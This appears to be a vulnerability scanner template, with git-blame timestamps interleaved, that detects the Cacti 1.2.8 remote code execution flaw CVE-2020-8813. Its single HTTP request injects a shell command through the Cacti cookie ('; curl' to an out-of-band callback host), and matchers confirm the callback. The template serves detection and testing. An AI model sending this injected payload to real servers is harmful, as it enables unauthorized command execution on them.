2021-07-26 02:32:23 +00:00
id : CVE-2020-8813
info :
2022-06-27 18:12:09 +00:00
name : Cacti v1.2.8 - Remote Code Execution
2021-07-26 02:32:23 +00:00
author : gy741
2021-09-10 11:26:40 +00:00
severity : high
2022-06-27 18:12:09 +00:00
description : Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled.
2021-08-18 11:37:49 +00:00
reference :
2021-07-26 02:32:23 +00:00
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
2022-05-17 09:18:12 +00:00
- https://github.com/Cacti/cacti/releases
- https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129
- https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view
2022-06-27 18:12:09 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-8813
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-8813
cwe-id : CWE-78
2023-07-11 19:49:27 +00:00
epss-score : 0.96233
cpe : cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cacti
product : cacti
tags : cve,cve2020,cacti,rce,oast
2021-07-26 02:32:23 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-26 02:32:23 +00:00
- raw :
- |
GET /graph_realtime.php?action=init HTTP/1.1
Host : {{Hostname}}
2023-03-31 06:39:06 +00:00
Cookie : Cacti=%3Bcurl%20http%3A//{{interactsh-url}}
2021-07-26 02:32:23 +00:00
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2022-06-27 18:12:09 +00:00
2023-03-31 06:39:06 +00:00
- type : word
part : interactsh_request
words :
- "User-Agent: curl"